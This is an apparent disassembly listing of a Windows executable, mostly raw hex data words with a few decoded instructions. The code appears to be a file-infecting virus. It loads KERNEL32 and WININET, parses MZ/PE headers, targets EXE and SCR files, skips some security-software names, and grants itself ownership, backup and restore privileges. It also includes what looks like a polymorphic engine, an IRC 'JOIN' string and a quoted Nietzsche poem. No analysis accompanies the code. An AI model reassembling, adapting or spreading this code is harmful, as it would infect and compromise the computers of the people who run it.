dd 75B58D06h, 5400101Eh, 51505056h, 6A95FF52h, 5800103Fh
dd 3F6295FFh, 85C60010h, 104183h, 0CE800h, 53570000h, 334B434Fh
dd 4C442E32h, 95FF004Ch, 103EC6h, 76893h, 0B58D0000h, 1018E9h
dd 32BD8D59h, 0E800103Fh, 0FFFFF53Dh, 0CE8h, 4E495700h
dd 54454E49h, 4C4C442Eh, 0C695FF00h, 8500103Eh, 35840FC0h
dd 93000002h, 568h, 27B58D00h, 59001019h, 3F4EBD8Dh, 6E80010h
dd 83FFFFF5h, 103F52BDh, 840F0000h, 210h, 190EC81h, 68540000h
dd 101h, 3F3295FFh, 0C4810010h, 190h, 6AD48B50h, 95FF5200h
dd 103F52h, 7559C085h, 1388680Dh, 95FF0000h, 103EE6h, 0BD83E2EBh
dd 101E77h, 8D297500h, 101E7B85h, 95FF5000h, 103F3Eh, 840FC085h
dd 189h, 8B0C408Bh, 8F30FF00h, 101E7785h, 8385C600h, 1001041h
dd 16A006Ah, 95FF026Ah, 103F4Ah, 0FFFF883h, 16084h, 958D9300h
dd 101E73h, 5352106Ah, 3F3A95FFh, 0C0850010h, 140850Fh
dd 0BD8D0000h, 101E94h, 3CE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 103EBE95h, 0A2BD8D00h, 0B100101Eh, 0FA1DE801h
dd 958DFFFFh, 101E8Fh, 1468006Ah, 52000000h, 4695FF53h
dd 8D00103Fh, 8D142444h, 10432495h, 0B60F5000h, 24448B0Ah
dd 8E0C114h, 12014A02h, 4A12024Ah, 24440B03h, 0FE18008h
dd 5108E0C1h, 1024440Bh, 8D5032FFh, 103F84BDh, 1CE800h
dd 2E250000h, 2E207836h, 3A202E20h, 2E252525h, 78257838h
dd 0A732520h, 4E494F4Ah, 0FF570020h, 103E7695h, 0ACC48100h
dd 6A000000h, 53575000h, 3F4695FFh, 8D8B0010h, 101598h
dd 1BE3006Ah, 510DC96Bh, 5E8h, 64252600h, 0FF57000Ah, 103E7695h
dd 0CC48300h, 680BEB50h, 7, 1EA8BD8Dh, 53570010h, 3F4695FFh
dd 0C0850010h, 0B58D547Eh, 103F84h, 1598A583h, 8D000010h
dd 1041838Dh, 6ACE2B00h, 53565100h, 3F4295FFh, 0F8830010h
dd 912F7E00h, 0B58DFE8Bh, 103F84h, 0AEF20DB0h, 0E8601075h
dd 0FFFFFA2Ah, 0E3177261h, 1778D09h, 0CF8BEAEBh, 0BD8DCE2Bh
dd 103F84h, 0F787A4F3h, 0FF53B9EBh, 103F3695h, 7FBD8000h
dd 1001015h, 30682A74h, 0FF000075h, 103EE695h, 83BD8000h
dd 1041h, 85C71174h, 101E77h, 0
dd 418385C6h, 0E9000010h, 0FFFFFE08h, 158885C7h, 10h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 0A2A1A821h, 0A614294Ch
dd 0A6141310h, 95D1CA10h, 68988F7Fh, 0B1FAE5C7h, 0D82DBD27h
dd 38h, 18h dup(0)
dd 0A5836000h, 1042F4h, 0F8A58300h, 1042h, 1443B70Fh, 0F18538Dh
dd 3064BB7h, 24448BD0h, 0C422B24h, 423B1972h, 8B147308h
dd 422B1442h, 0F495890Ch, 89001042h, 1042F885h, 8305EB00h
dd 0D9E228C2h, 4C261h, 24678588h, 64E80010h, 68000000h
dd 20h, 2394858Dh, 39590010h, 830C7418h, 0F7E204C0h, 42D085FFh
dd 0F7C30010h, 678D03D9h, 0E3001024h, 0FC70FF10h, 0E883008Fh
dd 89F6E204h, 1023949Dh, 3A8300h, 322B0574h, 8D107203h
dd 5B58FC4Eh, 3A835Eh, 32FF0474h, 72FF03EBh, 0FF57E810h
dd 0CE2BFFFFh, 42F88D2Bh, 3580010h, 8FC3344Bh, 1042D485h
dd 0D085C700h, 1042h, 0E8000000h, 3Ch, 42D0858Bh, 0A9E80010h
dd 0E8FFFFF6h, 18h, 42D0BD83h, 75000010h, 109D8908h, 0EB001024h
dd 0D08DFF9Ch, 0C3001042h, 42D4858Fh, 95890010h, 1042D0h
dd 3E8h, 0C3C93300h, 80938Bh, 0E8520000h, 0FFFFFEEDh, 42F89503h
dd 0D6030010h, 0C7A83h, 107840Fh, 7A830000h, 840F0010h
dd 0FDh, 500C428Bh, 0FFFEC8E8h, 0F88503FFh, 3001042h, 88A50C6h
dd 7400F980h, 2EF98019h, 0EB400374h, 1488BF1h, 0DFDFE181h
dd 0F981DFDFh, 4C4C44h, 2B59EC75h, 0FAF983C8h, 0B78F0Fh
dd 81660000h, 3233FE78h, 0AB850Fh, 83560000h, 575003Ah
dd 0EB104A8Bh, 30A8B02h, 72E851F1h, 3FFFFFEh, 1042F8B5h
dd 0C085AD00h, 840FFB78h, 84h, 42F8B5FFh, 0E8500010h, 0FFFFFE55h
dd 42F88503h, 858F0010h, 1042F8h, 53240403h, 3302C083h
dd 8B60FDBh, 0C98012E3h, 24C15320h, 1C290424h, 240C2924h
dd 0E9EB405Bh, 0D70FFB81h, 3E74DDBBh, 45A8FB81h, 3674DB6Eh
dd 3B59FB81h, 2E74FFA1h, 22D6FB81h, 2674ACB5h, 0E993FB81h
dd 1E74F358h, 0E97DFB81h, 1674F358h, 3F46FB81h, 0E74E125h
dd 3F30FB81h, 674E125h, 42D495FFh, 0E95B0010h, 0FFFFFF71h
dd 14C2835Eh, 0FFFEEFE9h, 6A00C3FFh, 49E85804h, 88FFFFF5h
dd 10264195h, 31B86600h, 0C0E20218h, 0E20203E4h, 66AAB66h
dd 0F52EE858h, 0C283FFFFh, 6AD18708h, 21E85805h, 80FFFFF5h
dd 0B7303FAh, 850250B0h, 102641h, 6A27EBAAh, 80AA5868h
dd 187503FAh, 1E811B0h, 0B8FFFFF5h, 1, 0D74D284h, 0CAFEE0D1h
dd 5EBF6EBh, 0B8h, 0BFE2AB80h, 0CC958DC3h, 2B001039h, 0C3DAF7D7h
dd 39C085F7h, 10h, 950F1000h, 0BE0C1C0h, 39BE85F6h, 75010010h
dd 890D6606h, 0F613EB25h, 1039BE85h, 6750200h, 25310D66h
dd 0D6604EBh, 0AB662501h, 0FFFFBCE8h, 34438BFFh, 42E89589h
dd 0C3AB0010h, 39C085F7h, 10h, 950F1000h, 0AABC04C0h, 0FFFF9CE8h
dd 0EC9589FFh, 0F6001042h, 1039BE85h, 4750100h, 2EB310Fh
dd 0C3ABC02Bh, 39C085F7h, 10h, 27741000h, 39BA858Ah, 0E0C10010h
dd 8B0D660Bh, 0B0AB6645h, 858AAAF8h, 1039BAh, 51BE0C1h
dd 6896467h, 66C033ABh, 0B812EBABh, 58F64h, 0BA858AABh
dd 4001039h, 18E0C158h, 85C6C3ABh, 10279Ch, 0B025EB09h
dd 6620EBFCh, 6600EBB8h, 6A19EBABh, 9E85804h, 8DFFFFF4h
dd 0E0C1D204h, 89056608h, 0EBAB66C0h, 0AA90B003h, 0E858156Ah
dd 0FFFFF3F0h, 279C8580h, 80060010h, 2F7308FAh, 0C374D284h
dd 0C374CAFEh, 0C774CAFEh, 0D974CAFEh, 0C74CAFEh, 2 dup(0F74CAFEh)
dd 0CBEBF9B0h, 0B0AA87B0h, 0B0C4EBDBh, 0B0C0EBF5h, 0C3BCEBF8h
dd 39C085F7h, 20000010h, 86B00000h, 4040275h, 8AFE4F8Dh
dd 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h, 0E8AA40FFh
dd 0FFFFFF62h, 39C085F7h, 40000010h, 0B8660000h, 2753166h
dd 0AB6629B4h, 850A18B0h, 1039BAh, 0AA03E0C0h, 0FFFF3DE8h
dd 0F788B0FFh, 1039C085h, 800000h, 0B0027500h, 0B8A58A86h
dd 66001039h, 5FC80ABh, 0B00775h, 40FF4F80h, 0BD8DC3AAh
dd 1039CCh, 0FFFF0DE8h, 0C085F7FFh, 1039h, 74004000h, 0AA60B003h
dd 39C085F7h, 10h, 7741000h
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dw 0
dd 0F0840F02h, 0B0000000h, 89ABAAE8h, 1042D8BDh, 0FECCE800h
dd 0E8B0FFFFh, 0BD89ABAAh, 1042DCh, 0FFFEBDE8h, 0C085F7FFh
dd 3001039h, 74000000h, 0C085F71Ah, 1039h, 74020000h, 0FE2EE80Ah
dd 9BE8FFFFh, 0B0FFFFFEh, 8BABAAE9h
dword_4439A4 dd 1042D885h ; .rsrc:0042CA20�o
db 0, 8Bh, 0CFh
byte_4439AB db 2Bh ; DATA XREF: sub_427577+3�o
dd 0E0BD89C8h, 89001042h, 67B8FC48h, 0AB36FF64h, 0AB66C033h
dd 39C085F7h, 30010h, 13740000h, 39BE85F6h, 74800010h
db 0Ah
byte_4439D5 db 0E8h, 0AAh, 0FDh ; DATA XREF: .aspack:0042705C�r
; .rsrc:0042CA27�r
dd 5BE8FFFFh, 0B8FFFFFEh
db 67h
dword_4439E1 dd 0AB268964h ; .rsrc:0042CA63�w
dword_4439E5 dd 0AB66C033h ; .rsrc:0042CA77�w
db 0F7h, 85h, 0C0h
db 39h
dword_4439ED dd 30010h ; .aspack:00427571�r
dword_4439F1 dd 5A740000h ; .aspack:00427569�r
db 0F6h, 85h, 0BEh
dd 80001039h, 81E80A75h, 0E8FFFFFDh, 0FFFFFE32h, 0FFFD02E8h
dd 0E820B0FFh, 0FFFFFB14h, 0B86639E3h, 0AB6615FFh, 958BAB91h
dd 1039C0h, 0C2F7D2F7h, 3, 0DCE81475h, 0B0FFFFFCh, 0FAEEE81Fh
dd 0B866FFFFh, 0AB6615FFh, 0CF8BAB91h, 42E0858Bh, 0C82B0010h
dd 0F7FC4889h, 1039C085h, 300h, 0F7387400h, 1039C085h
dd 0
dd 0F72C740Ch, 1039C085h, 0
dd 0E80A7502h
; ---------------------------------------------------------------------------
locret_443A74: ; DATA XREF: .aspack:loc_4274DB�r
retn 0FFFDh
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFD4BE8h, 0C085F7FFh, 1039h, 74080000h, 0FDACE80Ah
dd 61E8FFFFh, 0F7FFFFFDh, 1039C085h, 400h, 0E8177400h
dd 0FFFFFD96h, 0FEC029B8h, 8B8ABC8h, 0AB0474C0h, 0EBF875B8h
dd 7FE8AB67h, 0F7FFFFFDh, 1039C085h, 800h, 80727500h, 1039BEBDh
dd 69740000h, 0FFFD65E8h, 1829B8FFh, 0A50AC929h, 1039BAh
dd 0A03E4C0h, 1039BAA5h, 4BE8AB00h, 0B0FFFFFDh, 858AAAB1h
dd 1039BEh, 0FD3CE8AAh, 0B60FFFFFh, 1039BA85h, 0C0048D00h
dd 0E0C14004h, 668DB008h, 0AA01B0ABh, 0FD20E857h, 3C29FFFFh
dd 0E2B86624h, 85F759FBh, 1039C0h, 10h, 49B00774h, 75B866AAh
dd 66E102FAh, 0FCFCE8ABh, 0E8B0FFFFh, 0ABC033AAh, 42C4BD89h
dd 85F70010h, 1039C0h, 20h, 0E8573B75h, 0FFFFFCDEh, 39C085F7h
dd 10h, 18748000h, 42F0BD89h, 39E80010h
db 0FDh, 0FFh
dword_443B72 dd 0FCC2E8FFh ; .rsrc:0042CA7D�r
dw 0FFFFh
dd 0E8AAC3B0h, 0FFFFFCBAh, 0B0CF8B5Ah, 0ACA2B58h, 1039B885h
dd 0FC4A8900h, 0FCA4E8AAh, 0B866FFFFh, 85F7C081h, 1039C0h
dd 40h, 0C4800374h, 0B8A50A28h, 66001039h, 0C8BD89ABh
dd 0AB001042h, 39C085F7h, 10h, 9754000h, 850250B0h, 1039B8h
dd 0C085F7AAh, 80001039h, 75000000h, 0AB8B00Bh, 1039B985h
dd 3DEBAA00h, 1831B866h, 39C085F7h, 1000010h, 2740000h
dd 0A50A29B0h, 1039B9h, 0A03E4C0h, 1039B9A5h, 66AB6600h
dd 0F7F081B8h, 1039C085h, 20000h, 0B4027500h, 0B9A50AC8h
dd 66001039h, 0E4BD89ABh, 0B8001042h, 29CCh, 0C085F7ABh
dd 8001039h, 74000000h, 0FBFCE871h, 85F7FFFFh, 1039C0h
dd 400h, 0B8B00B75h, 39BA850Ah, 0EBAA0010h, 0C085F74Dh
dd 1039h, 75000008h, 83B86611h, 0BAA50AE0h, 66001039h
dd 0AAC033ABh, 0B86615EBh, 0A50A1829h, 1039BAh, 0A03E4C0h
dd 1039BAA5h, 0F7AB6600h, 1039C085h, 100000h, 81B86600h
dd 800374C0h, 0A50A08C4h, 1039BAh, 0B60FAB66h, 1039BE85h
dd 8BE8AB00h, 0F7FFFFFBh, 1039C085h, 0
dd 0B00E7440h, 0B8850250h, 0AA001039h, 0FFFB71E8h, 0FE4F8DFFh
dd 42CC8D89h, 85F70010h, 1039C0h, 80000000h, 0E8B01774h
dd 0F0858BAAh, 2B001042h, 4E883C7h, 0F0BD89ABh, 0EB001042h
dd 0FBB2E805h, 3BE8FFFFh, 0F7FFFFFBh, 1039C085h, 1000000h
dd 0B00B7500h, 0B8850A40h, 0AA001039h, 0B8660FEBh, 0A50AC083h
dd 1039B8h, 1B0AB66h, 0C085F7AAh, 1039h, 75000200h, 0C085F72Fh
dd 1039h, 75000400h, 0AC0B01Ah, 1039BA85h, 0BFA58A00h
dd 0C1001039h, 0B86610E0h, 0B0AB8166h, 0B008EB00h, 0BA850A40h
dd 0AA001039h, 39C085F7h, 10h, 10750008h, 0E883B866h, 39B9A50Ah
dd 0AB660010h, 8EB01B0h, 850A48B0h, 1039B9h, 0FAB0E8AAh
dd 85F7FFFFh, 1039C0h, 100000h, 257575B1h, 0F883B866h
dd 39B9A50Ah, 0AB660010h, 29AAC033h, 1042CCBDh, 0C085F700h
dd 1039h, 75002000h, 0EB77B11Fh, 9B8661Bh, 0B9A50A18h
dd 0C0001039h, 0A50A03E4h, 1039B9h, 0BD29AB66h, 1042CCh
dd 0A58AC18Ah, 1042CCh, 58B0AB66h, 39B88502h, 0E8AA0010h
dd 0FFFFFA4Ah, 39C085F7h, 30010h, 2C740200h, 39C085F7h
dd 10h, 20750800h, 39C085F7h, 10h, 0A750600h, 0FFF9AFE8h
dd 0FA1CE8FFh, 0D1E8FFFFh, 0E8FFFFF9h, 0FFFFFA12h, 39C085F7h
dd 10h, 8741000h, 0E8AAC9B0h, 0FFFFF9FEh, 39C085F7h, 10h
dd 2A740040h, 852A07B0h, 1039B8h, 0D1AE0C1h, 240889h, 39B8A502h
dd 0E4C00010h, 4C48003h, 0F9D0E8ABh, 61B0FFFFh, 0F9C8E8AAh
dd 0B866FFFFh, 0A50AE0FFh, 1039B8h, 0B7E8AB66h, 0F7FFFFF9h
dd 1039C085h, 2000h, 0F76F7400h, 1039C085h, 0
dd 8B1F7480h, 0F08D8BC7h
db 42h
byte_443EA1 db 10h, 0, 2Bh ; DATA XREF: .aspack:004274EB�w
dd 0FC4189C1h, 0FFF9FFE8h, 0F988E8FFh, 0C3B0FFFFh, 0F980E8AAh
dd 0C78BFFFFh, 42C48D8Bh, 0C12B0010h, 0B0FC4189h, 0B8850A58h
dd 0AA001039h, 0FFF965E8h, 0C085F7FFh, 1039h, 74008000h
dd 50B8660Ch, 0B8850AC3h, 0EB001039h, 0FFB8660Ah, 0B8A50AE0h
dd 66001039h, 0F93CE8ABh, 85F7FFFFh, 1039C0h, 2000003h
dd 0CF8B5F74h, 42DC858Bh, 0C82B0010h, 33FC4889h, 0C085F7C9h
dd 1039h, 75010000h, 0B8858D0Eh, 8A001039h, 0F9804008h
dd 8DF87303h, 2444CD04h, 0E0C10010h, 0AB8BB008h, 0B86606E3h
dd 0AB66C031h, 808FB866h, 0B868h, 66E10200h, 85AB58ABh
dd 660675C9h, 66C031B8h, 0AAC3B0ABh, 0FFF8D1E8h, 0CC858DFFh
dd 0F7001039h, 1039C085h, 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
push edi
sub edi, eax
pop eax
jmp short loc_443F9A
; ---------------------------------------------------------------------------
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
loc_443F8E: ; DATA XREF: sub_427BC0+EF�r
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_443F9A: ; CODE XREF: .rsrc:00443F7F�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
loc_443FA6: ; DATA XREF: sub_427BC0+85�r
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_443FBA
neg eax
loc_443FBA: ; CODE XREF: .rsrc:00443FB6�j
stosd
retn 4
; ---------------------------------------------------------------------------
dw 5756h
dd 4300BD83h
db 10h, 2 dup(0)
byte_443FC7 db 0Fh, 84h, 0D9h, 1, 2 dup(0), 0E8h, 0Dh, 3 dup(0), 4Bh
; DATA XREF: sub_42793D+17�r
; sub_427BC0+118�r
db 45h, 52h, 4Eh, 45h, 4Ch, 33h, 32h, 2Eh, 44h, 2 dup(4Ch)
db 0, 0FFh, 95h, 0AEh, 3Eh, 10h, 0, 89h, 85h, 14h, 43h
db 10h, 0, 53h, 8Bh, 58h, 3Ch, 3, 0D8h, 0FFh, 73h, 28h
db 8Bh, 43h, 34h, 0E8h, 0E5h, 0F4h, 2 dup(0FFh), 8Bh, 95h
db 0F4h, 42h, 10h, 0, 5Bh, 3, 42h, 0Ch, 89h, 85h, 18h
db 43h, 10h, 0, 3, 42h, 8, 89h, 85h, 1Ch, 43h, 10h, 0
db 8Bh, 73h, 28h, 0FFh, 0B3h, 80h, 3 dup(0), 0E8h, 0BEh
db 0F4h, 2 dup(0FFh), 8Bh, 0BDh, 0F4h, 42h, 10h, 0, 56h
db 0E8h, 0B2h, 0F4h, 2 dup(0FFh), 8Bh, 95h, 0F4h, 42h
db 10h, 0, 8Bh, 4Ah, 8, 3, 4Ah, 0Ch, 2Bh, 0CEh, 83h, 0E9h
db 5, 0Fh, 88h, 60h, 1, 2 dup(0), 0Fh, 84h, 5Ah, 1, 2 dup(0)
db 3, 0B5h, 0F8h, 42h, 10h, 0, 3, 0B5h, 0B4h, 42h, 10h
db 0, 0ACh, 3Ch, 0E8h, 0Fh, 85h, 0A2h, 3 dup(0), 8Dh, 46h
db 4, 2Bh, 85h, 0B4h, 42h, 10h, 0, 3, 6, 50h, 0E8h, 6Fh
db 0F4h, 2 dup(0FFh), 83h, 0BDh, 0F4h, 42h, 10h, 2 dup(0)
db 75h, 0Bh, 3Bh, 47h, 0Ch, 0Fh, 83h, 1Bh, 1, 2 dup(0)
db 0EBh, 0Ch, 39h, 95h, 0F4h, 42h, 10h, 0, 0Fh, 85h, 0Dh
db 1, 2 dup(0), 3, 85h, 0B4h, 42h, 10h, 0, 66h, 81h, 38h
db 0FFh, 25h, 0Fh, 85h, 0FCh, 3 dup(0), 8Bh, 40h, 2, 2Bh
db 43h, 34h, 50h, 0E8h, 32h, 0F4h, 2 dup(0FFh), 39h, 0BDh
db 0F4h, 42h, 10h, 0, 0Fh, 85h, 0E4h, 3 dup(0), 3, 85h
db 0F8h, 42h, 10h, 0, 3, 85h, 0B4h, 42h, 10h, 0, 8Bh, 0
db 2Bh, 47h, 0Ch, 0Fh, 82h, 0CDh, 3 dup(0), 3Bh, 47h, 8
db 0Fh, 83h, 0C4h, 3 dup(0), 83h, 0C0h, 2, 3, 47h, 14h
db 3, 85h, 0B4h, 42h, 10h, 0, 52h, 50h, 0FFh, 0B5h, 14h
db 43h, 10h, 0, 0FFh, 95h, 6Eh, 3Eh, 10h, 0, 5Ah, 85h
db 0C0h, 0Fh, 85h, 0B7h, 3 dup(0), 0E9h, 9Ch, 3 dup(0)
db 3Ch, 0FFh, 0Fh, 85h, 94h, 3 dup(0), 80h, 3Eh, 15h, 0Fh
db 85h, 8Bh, 3 dup(0), 8Bh, 46h, 1, 2Bh, 43h, 34h, 50h
db 0E8h, 0C1h, 0F3h, 2 dup(0FFh), 39h, 0BDh, 0F4h, 42h
db 10h, 0, 75h, 77h, 3, 85h, 0F8h, 42h, 10h, 0, 3, 85h
db 0B4h, 42h, 10h, 0, 89h, 85h, 20h, 43h, 10h, 0, 8Bh
db 0, 3Bh, 85h, 18h, 43h, 10h, 0, 72h, 8, 3Bh, 85h, 1Ch
db 43h, 10h, 0, 72h, 69h, 3Dh, 3 dup(0), 70h, 72h, 37h
db 0E8h, 1Fh, 3 dup(0), 8Dh, 4Eh, 0FCh, 8Bh, 0C1h, 2Bh
db 2, 3, 42h, 10h, 3Bh, 85h, 20h, 43h, 10h, 0, 75h, 0Ch
db 83h, 0C4h, 10h, 0FFh, 31h, 8Fh, 44h, 24h, 1Ch, 61h
db 0EBh, 1Bh, 0C3h, 8Fh, 85h, 0D4h, 42h, 10h, 0, 60h, 8Bh
db 0B5h, 0B4h, 42h, 10h, 0, 0E8h, 5Fh, 0F4h, 2 dup(0FFh)
db 61h, 0A9h, 3 dup(0), 80h, 75h, 0Eh, 2Bh, 47h, 0Ch, 72h
db 9, 3Bh, 47h, 8, 0Fh, 82h, 3Ch, 3 dup(0FFh), 49h, 0Fh
db 85h, 0B2h, 0FEh, 2 dup(0FFh), 8Bh, 3Ch, 24h, 81h, 0A7h
db 0C0h, 29h, 2 dup(0), 2 dup(0FFh), 0BFh, 0FFh, 0EBh
db 42h, 81h, 4Ah, 24h, 60h, 2 dup(0), 0E0h, 4Eh, 33h, 0C0h
db 8Bh, 0Ch, 24h, 87h, 85h, 0, 43h, 10h, 0, 89h, 85h, 0FCh
db 42h, 10h, 0, 8Dh, 0B9h, 0C4h, 29h, 2 dup(0), 3, 85h
db 0B4h, 42h, 10h, 0, 66h, 2 dup(0A5h), 4Eh, 2Bh, 0C6h
db 3, 42h, 14h, 2Bh, 42h, 0Ch, 0C6h, 46h, 0FBh, 0E8h, 0C7h
db 81h, 54h, 3 dup(0), 5, 3 dup(0), 89h, 46h, 0FCh, 5Fh
db 5Eh, 0C3h, 57h, 0FFh, 95h
db 0BAh, 3Eh, 10h, 0, 0C1h, 0E8h, 1Fh, 0Fh, 85h, 1Ah, 1
db 2 dup(0), 50h, 54h, 6Ah, 28h, 6Ah, 2 dup(0FFh), 95h
db 1Ah, 3Fh, 10h, 0, 85h, 0C0h, 5Fh, 0Fh, 88h, 5, 1, 2 dup(0)
db 0E8h, 58h, 0E4h, 2 dup(0FFh), 0E8h, 11h, 3 dup(0), 53h
db 65h, 74h, 46h, 69h, 6Ch, 65h, 53h, 65h, 63h, 75h, 72h
db 69h, 74h, 79h, 41h, 0, 0FFh, 0B5h, 88h, 42h, 10h, 0
db 0FFh, 95h, 6Eh, 3Eh, 10h, 0, 89h, 85h, 90h, 42h, 10h
db 0, 0E8h, 19h, 3 dup(0)
aSetakeownershi db 'SeTakeOwnershipPrivilege',0
dw 0E857h
dd 0FFFFE829h, 13E8h, 52655300h, 6F747365h, 72506572h
dd 6C697669h, 656765h, 0E80BE857h, 12E8FFFFh, 53000000h
dd 63614265h, 5070756Bh, 69766972h, 6567656Ch, 0EEE85700h
dd 0E8FFFFE7h, 18h, 68436553h, 65676E61h, 69746F4Eh, 72507966h
dd 6C697669h, 656765h, 0E7CBE857h, 5450FFFFh, 3DCC858Dh
dd 646A0010h, 57016A50h, 3F2695FFh, 3C890010h, 6295FF24h
dd 2A00103Eh, 84BD8DC0h, 50001041h, 0B5FF5050h, 103DCCh
dd 4000168h, 16A5400h, 9095FF57h, 54001042h, 0FF57046Ah
dd 10429095h, 14C48300h, 4288B5FFh, 95FF0010h, 103E9Eh
dd 0B58DC35Fh, 104184h, 0A295FF56h, 8300103Eh, 840FFFF8h
dd 0BBh, 42948589h, 6A0010h, 0DE95FF56h, 8500103Eh, 0A4840FC0h
dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 103E7Eh
dd 0FFFF883h, 60784h, 98858900h, 8D001042h, 10429C8Dh
dd 0A4958D00h, 51001042h, 50006A52h, 3EAA95FFh, 0F8830010h
dd 0D5840FFFh, 6A000005h, 98B5FF00h, 0FF001042h, 103EA695h
dd 0FFF88300h, 5BE840Fh, 85890000h, 1042ACh, 0C303C933h
dd 6A515051h, 0B5FF5104h, 104298h, 3E8295FFh, 0C0850010h
dd 59A840Fh, 0C9330000h, 42B08589h, 51510010h, 1F6851h
dd 0FF50000Fh, 103ECA95h, 0FC08500h, 55384h, 0B4858900h
dd 0C3001042h, 7327B8h, 384B8B00h, 39C085F7h, 10h, 6752000h
dd 10698503h, 0D2330010h, 0F1F7C103h, 8589E1F7h, 1042C0h
dd 29CBB8h, 3C4B8B00h, 10698503h, 0D2330010h, 0F1F7C103h
dd 8589E1F7h, 1042B8h, 4BB70FC3h, 35E3F906h, 0F18538Dh
dd 31443B7h, 0C16B49D0h, 81D00328h, 69775F3Ah, 1D74F96Eh
dd 10C7A83h, 4B8BE072h, 14428B3Ch, 8D104203h, 0F7FF4844h
dd 3BC123D9h, 1042AC85h, 548BC300h, 0C0331024h, 0B8828Fh
dd 8BC30000h, 8D0BEBCFh, 104184BDh, 0DF8BFC00h, 3CACC933h
dd 3C067261h, 2C02777Ah, 5C3CAA20h, 2E3CEC74h, 3CDD74h
dd 0C9E3E875h, 453D018Bh, 74004558h, 43533D0Bh, 850F0052h
dd 0FFFFFF33h, 573D038Bh, 0F434E49h, 0FFFF2684h, 43573DFFh
dd 840F4E55h, 0FFFFFF1Bh, 3343573Dh, 10840F32h, 3DFFFFFFh
dd 4F545350h, 0FF05840Fh, 0DB33FFFFh, 0FFFE2DE8h, 0E81075FFh
dd 0FFFFFCFAh, 0FFFE21E8h, 0EC840FFFh, 33FFFFFEh, 16E8D2h
dd 63E80000h, 0E8FFFFFFh, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 10344Fh
jmp loc_444922
; ---------------------------------------------------------------------------
dd 8B32FF64h, 1042B4B5h, 22896400h, 4D3E8166h, 0E3850F5Ah
dd 8B000003h, 0DE033C5Eh, 503B8166h, 0D3850F45h, 0F7000003h
dd 20001643h, 850F0000h
db 0C6h, 3, 0
byte_44455B db 0 ; DATA XREF: sub_427BB8+1�o
dd 25C43F6h, 3BC840Fh, 438B0000h, 0A0A03D08h, 840FA0A0h
dd 3AEh, 2020203Dh, 0A3840F20h, 8B000003h, 0C88Bh, 5116E300h
dd 0FFEF54E8h, 0F88D03FFh, 3001042h, 406183CEh, 44618300h
dd 0FE9BE800h, 820FFFFFh, 37Ah, 42FCA583h, 8B000010h, 4A8B0842h
dd 73C12B10h, 0EBC03304h, 89C80305h, 8589104Ah, 1042BCh
dd 0B80C4A03h, 10000h, 0E68AE851h, 9530FFFFh, 1039BEh
dd 0B53020B1h, 1039BFh, 0C9FE206Ah, 0E8147858h, 0FFFFE670h
dd 940FD285h, 31E2D3C2h, 1039C095h, 0F7E5EB00h, 1039C085h
dd 0
dd 0F7227402h, 1039C085h, 300h, 810C7500h, 1039C0A5h, 0FFFFFF00h
dd 810AEBF7h, 1039C08Dh, 0
dd 66810h, 68590000h, 6, 0E622E858h, 858AFFFFh, 1039B8h
dd 0B82A8486h, 88001039h, 1039B885h, 0F7E0E200h, 1039C085h
dd 800h, 80097500h, 1039BABDh, 0C5740100h, 39C085F7h, 10h
dd 1B741000h, 39B8BD80h, 74050010h, 0B9BD80B0h, 5001039h
dd 0BD80A774h, 1039BAh, 0F79E7405h, 1039C085h, 40000000h
dd 80097400h, 1039B8BDh, 89770200h, 4300A583h, 0E8000010h
dd 0FFFFF272h, 0FFFD43E8h, 271E8FFh, 9D8B0000h, 1042B8h
dd 42BC9D03h, 5BE80010h, 0FFFFFFCh, 25184h, 0B4B58B00h
dd 8B001042h, 0DE033C5Eh, 0FFFD5CE8h, 3B820FFFh, 81000002h
dd 60244Ah, 0FE8BE000h, 7A035652h, 107A0314h, 39C085F7h
dd 10h, 14752000h, 4304BD89h, 0B58D0010h, 1039CCh, 10698D8Bh
dd 0A4F30010h, 0A73B957h, 0B58D0000h, 101000h, 0B1A5F3h
dd 0A4F302E3h, 39C085F7h, 10h, 840F2000h, 0AEh, 0E82873FFh
dd 0FFFFED9Dh, 42F4958Bh, 0D2850010h, 98840Fh, 0B58B0000h
dd 1042B4h, 81104A8Bh, 60244Ah, 4A2BE000h, 33027308h, 147203C9h
dd 10698D3Bh, 8D8B0010h, 101069h, 3C8B5672h, 69A58324h
dd 1010h, 69A783h, 8B000000h, 4A01087Ah, 87F70308h, 0C8858BF7h
dd 0F7001042h, 1039C085h, 4000h, 0F7027400h, 0C720318h
dd 0B5893029h, 104300h, 128738Bh, 0C085F730h, 40001039h
dd 74000000h, 5118F702h, 0FFFC2BE8h, 0CEB59FFh, 2B287303h
dd 56510C72h, 595FA4F3h, 39CCB58Dh, 0BD890010h, 104304h
dd 5E5FA4F3h, 8D92310Fh, 13787h, 0BE953A00h, 75001039h
dd 78D26906h, 66123456h
dword_444804 dd 0E8E75089h ; .aspack:00427069�w ...
dword_444808 dd 0FFFFD9E1h ; .aspack:00427502�r ...
dword_44480C dd 0C4A8B5Ah ; .rsrc:0042CA40�r
dd 0F7104A03h, 1039C085h
db 0
